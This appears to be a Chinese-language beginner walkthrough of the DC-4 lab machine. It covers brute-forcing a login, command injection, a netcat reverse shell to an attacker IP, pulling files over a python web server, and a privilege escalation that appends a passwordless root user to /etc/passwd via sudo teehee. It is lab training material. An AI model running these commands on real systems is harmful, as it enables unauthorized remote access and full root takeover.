DC4靶场新手详细教程

DC4

信息收集

内网探测

端口扫描

指纹识别

打开网站

我们从官方的手册上来看是爆破用户密码

登录之后

这个指令好想是可以命令执行的抓包看一下

漏洞利用

发现是可以命令执行的

我们尝试反弹shell

nc -lvp 8888

nc 192.168.189.139 8888 -e /bin/bash

拿到shell

启用python交互模式

python -c 'import pty;pty.spawn("/bin/bash")'

内网信息收集

然后我们先看看home目录下有几个用户

cd /home

有三个用户

第一个用户里面没有东西然后jim用户里面

有一个old密码我们先把这个保存下来看看有没有python

开启一个http服务然后wget下来

python3 -m http.server 7777

然后本地 wget ip:7777/文件名

这个密码文可能是jim的用户密码我们尝试爆破一下

ssh连接起来

里面有一个邮件我们看一下然后我们看看系统邮箱在哪

:::warning /var/spool/mail/ 这个就是系统邮箱的位置了

:::

这里是告诉了我们charles的密码猜测应该是ssh的密码切换用户试试 密码:^xHhA&hvim0y

提权

发现是有teehee提权的

teehee应该是一个类似于echo的东西然后我们可以通过这个teehee来将/etc/passwd中添加一个不需要密码就可以登录的用户并且具有root权限,

里面有七个字段然后

admin::0:0:::/bin/bash 我们可以将用户设置成这个格式这个格式的意思是用户是admin 无密码 0是root权限 0是group root一个组别然后 使用 /bin/bashshell

完整的命令

echo "kail::0:0:::/bin/bash" >>/etc/passwd

echo"admin::0:0:::/bin/bash"|sudo teehee -a /etc/passwd

输入到指定的文件中

然后 su admin切换用户

root权限了

flag

总结

总结一下叭

这里我们学到了,python 本地开启web服务,然后/etc/passwd的信息构造

然后systemctl start apache2开启web服务

然后就是teehee提权

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值